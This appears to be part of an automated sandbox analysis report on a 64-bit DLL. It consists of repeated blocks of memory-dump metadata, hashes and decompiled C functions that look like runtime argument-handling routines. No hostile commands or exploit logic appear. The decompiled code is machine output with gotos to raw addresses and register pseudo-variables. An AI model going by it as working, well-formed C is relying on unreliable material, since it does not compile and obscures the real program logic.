                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                      • Instruction ID: 2fd4658360d83bf4c47cba2565616edb656173608119819fb52390affacbcccf
                                                                      • Opcode Fuzzy Hash: cdd9bf7ec4f2fb13d7b126373d23b0ea80a1411a4be800f5550d6fd662784f52
                                                                      • Instruction Fuzzy Hash: 8931A272208B88C6EB628F29E0503AD7BA0F79DB8CF248125EB4C4B751CF36C256D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180018758(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80018783;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80018852;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800187c4;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018854;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80018844;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018800;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80018854;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x800187f8;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x800187fb;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180018758
                                                                      0x180018769
                                                                      0x18001876c
                                                                      0x18001876e
                                                                      0x180018773
                                                                      0x18001877b
                                                                      0x18001877e
                                                                      0x18001878d
                                                                      0x18001878f
                                                                      0x180018795
                                                                      0x180018798
                                                                      0x18001879d
                                                                      0x1800187a1
                                                                      0x1800187a8
                                                                      0x1800187ae
                                                                      0x1800187b3
                                                                      0x1800187b8
                                                                      0x1800187bf
                                                                      0x1800187cf
                                                                      0x1800187d1
                                                                      0x1800187db
                                                                      0x1800187e0
                                                                      0x1800187e8
                                                                      0x1800187ea
                                                                      0x1800187f0
                                                                      0x1800187f5
                                                                      0x1800187f8
                                                                      0x1800187fe
                                                                      0x180018800
                                                                      0x180018804
                                                                      0x18001880a
                                                                      0x180018814
                                                                      0x180018816
                                                                      0x18001881a
                                                                      0x18001881d
                                                                      0x180018824
                                                                      0x180018828
                                                                      0x18001882f
                                                                      0x180018833
                                                                      0x180018838
                                                                      0x18001883d
                                                                      0x180018842
                                                                      0x18001884f
                                                                      0x18001885e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                      • Instruction ID: e1638ce56725cf949ac8fcfeebe8be8063e5bfa5281331c497428afcea7821a6
                                                                      • Opcode Fuzzy Hash: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                      • Instruction Fuzzy Hash: 8D317172604B88C6DBA5CF29E0803AD77A4F78DB88F648129EB8C4B750DF36C656D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180018860(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001888b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001895a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800188cc;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001895c;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001894c;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80018908;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001895c;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80018900;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80018903;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180018860
                                                                      0x180018871
                                                                      0x180018874
                                                                      0x180018876
                                                                      0x18001887b
                                                                      0x180018883
                                                                      0x180018886
                                                                      0x180018895
                                                                      0x180018897
                                                                      0x18001889d
                                                                      0x1800188a0
                                                                      0x1800188a5
                                                                      0x1800188a9
                                                                      0x1800188b0
                                                                      0x1800188b6
                                                                      0x1800188bb
                                                                      0x1800188c0
                                                                      0x1800188c7
                                                                      0x1800188d7
                                                                      0x1800188d9
                                                                      0x1800188e3
                                                                      0x1800188e8
                                                                      0x1800188f0
                                                                      0x1800188f2
                                                                      0x1800188f8
                                                                      0x1800188fd
                                                                      0x180018900
                                                                      0x180018906
                                                                      0x180018908
                                                                      0x18001890c
                                                                      0x180018912
                                                                      0x18001891c
                                                                      0x18001891e
                                                                      0x180018922
                                                                      0x180018925
                                                                      0x18001892c
                                                                      0x180018930
                                                                      0x180018937
                                                                      0x18001893b
                                                                      0x180018940
                                                                      0x180018945
                                                                      0x18001894a
                                                                      0x180018957
                                                                      0x180018966

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                      • Instruction ID: 8b7d6655bf3d42be2705683592c265a935ffe8f86e1b0367b3fb17f70fdd5f42
                                                                      • Opcode Fuzzy Hash: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                      • Instruction Fuzzy Hash: EF318272614B88C6DBA58F29D0503AD77A4F78DB8CF688125EB8C4B751CF36C296D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180016870(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001689c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t68 - 8));
                                                                      				goto 0x8001696a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800168dd;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x8001696c;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001695b;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80016917;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001696c;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x8001690f;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x80016912;
                                                                      				 *_t72 =  *((char*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180016870
                                                                      0x180016881
                                                                      0x180016884
                                                                      0x180016886
                                                                      0x18001688b
                                                                      0x180016894
                                                                      0x180016897
                                                                      0x1800168a6
                                                                      0x1800168a8
                                                                      0x1800168ae
                                                                      0x1800168b1
                                                                      0x1800168b6
                                                                      0x1800168ba
                                                                      0x1800168c1
                                                                      0x1800168c7
                                                                      0x1800168cc
                                                                      0x1800168d1
                                                                      0x1800168d8
                                                                      0x1800168e8
                                                                      0x1800168ea
                                                                      0x1800168f4
                                                                      0x1800168f8
                                                                      0x180016900
                                                                      0x180016902
                                                                      0x180016908
                                                                      0x18001690c
                                                                      0x18001690f
                                                                      0x180016915
                                                                      0x180016917
                                                                      0x18001691b
                                                                      0x180016921
                                                                      0x18001692b
                                                                      0x18001692d
                                                                      0x180016931
                                                                      0x180016934
                                                                      0x18001693b
                                                                      0x18001693f
                                                                      0x180016946
                                                                      0x18001694a
                                                                      0x18001694f
                                                                      0x180016954
                                                                      0x180016959
                                                                      0x180016967
                                                                      0x180016976

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1c54d9c9c91592db296d578c719c3ba6e2ed36079ac5c5fef9daf66805e4ed66
                                                                      • Instruction ID: d6f375cdd611fe9646d7e09eb1b1af1e3baa16d5beebf2d2c37cc30dc0bc7adc
                                                                      • Opcode Fuzzy Hash: 1c54d9c9c91592db296d578c719c3ba6e2ed36079ac5c5fef9daf66805e4ed66
                                                                      • Instruction Fuzzy Hash: 3831A272604B98C6DB628F29D4503AD7BA4E38DB9CF248125EB8C0B761CF36C196CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180016978(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800169a4;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((char*)(_t68 - 8));
                                                                      				goto 0x80016a72;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800169e5;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x80016a74;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80016a63;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80016a1f;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80016a74;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80016a17;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((char*)(_t68 - 8)));
                                                                      				goto 0x80016a1a;
                                                                      				 *_t72 =  *((char*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180016978
                                                                      0x180016989
                                                                      0x18001698c
                                                                      0x18001698e
                                                                      0x180016993
                                                                      0x18001699c
                                                                      0x18001699f
                                                                      0x1800169ae
                                                                      0x1800169b0
                                                                      0x1800169b6
                                                                      0x1800169b9
                                                                      0x1800169be
                                                                      0x1800169c2
                                                                      0x1800169c9
                                                                      0x1800169cf
                                                                      0x1800169d4
                                                                      0x1800169d9
                                                                      0x1800169e0
                                                                      0x1800169f0
                                                                      0x1800169f2
                                                                      0x1800169fc
                                                                      0x180016a00
                                                                      0x180016a08
                                                                      0x180016a0a
                                                                      0x180016a10
                                                                      0x180016a14
                                                                      0x180016a17
                                                                      0x180016a1d
                                                                      0x180016a1f
                                                                      0x180016a23
                                                                      0x180016a29
                                                                      0x180016a33
                                                                      0x180016a35
                                                                      0x180016a39
                                                                      0x180016a3c
                                                                      0x180016a43
                                                                      0x180016a47
                                                                      0x180016a4e
                                                                      0x180016a52
                                                                      0x180016a57
                                                                      0x180016a5c
                                                                      0x180016a61
                                                                      0x180016a6f
                                                                      0x180016a7e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2747f129a7923805dbf916e3789bd83c103e89e9218754317f5761cd0dcb249c
                                                                      • Instruction ID: d89a5b9b4993e822a6d69f9a4de31c76e38d13f5de4a93964f54abd5442bf959
                                                                      • Opcode Fuzzy Hash: 2747f129a7923805dbf916e3789bd83c103e89e9218754317f5761cd0dcb249c
                                                                      • Instruction Fuzzy Hash: 6931A272605B8486EB628F29D4503AD7BA0E79DB8CF64C125EB8C4B761DF36C596CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E000000011800189CC(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x800189f7;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80018ac4;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80018a38;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018ac6;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80018ab6;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80018a72;
                                                                      				 *_t72 = 3;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80018ac6;
                                                                      				_v24 = _t44;
                                                                      				r8d = 3;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80018a6a;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80018a6d;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x1800189cc
                                                                      0x1800189dd
                                                                      0x1800189e0
                                                                      0x1800189e2
                                                                      0x1800189e7
                                                                      0x1800189ef
                                                                      0x1800189f2
                                                                      0x180018a01
                                                                      0x180018a03
                                                                      0x180018a09
                                                                      0x180018a0c
                                                                      0x180018a11
                                                                      0x180018a15
                                                                      0x180018a1c
                                                                      0x180018a22
                                                                      0x180018a27
                                                                      0x180018a2c
                                                                      0x180018a33
                                                                      0x180018a43
                                                                      0x180018a45
                                                                      0x180018a4f
                                                                      0x180018a53
                                                                      0x180018a5b
                                                                      0x180018a5d
                                                                      0x180018a63
                                                                      0x180018a67
                                                                      0x180018a6a
                                                                      0x180018a70
                                                                      0x180018a72
                                                                      0x180018a76
                                                                      0x180018a7c
                                                                      0x180018a86
                                                                      0x180018a88
                                                                      0x180018a8c
                                                                      0x180018a8f
                                                                      0x180018a96
                                                                      0x180018a9a
                                                                      0x180018aa1
                                                                      0x180018aa5
                                                                      0x180018aaa
                                                                      0x180018aaf
                                                                      0x180018ab4
                                                                      0x180018ac1
                                                                      0x180018ad0

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                      • Instruction ID: 291ff4f9e2cabb05488b42f15fe48e5e576e3fb230daf3d9ad1c5c3a04f7054a
                                                                      • Opcode Fuzzy Hash: 4710899302d24e7e9b2f90bec6d6e083165e733f2ef44a89aeb9dad9fe7702c1
                                                                      • Instruction Fuzzy Hash: 11319372204B8486EB618F29D0503AD7BA0FB8DF88F64811AEB8C4B351DF36C256D704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180016A80(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
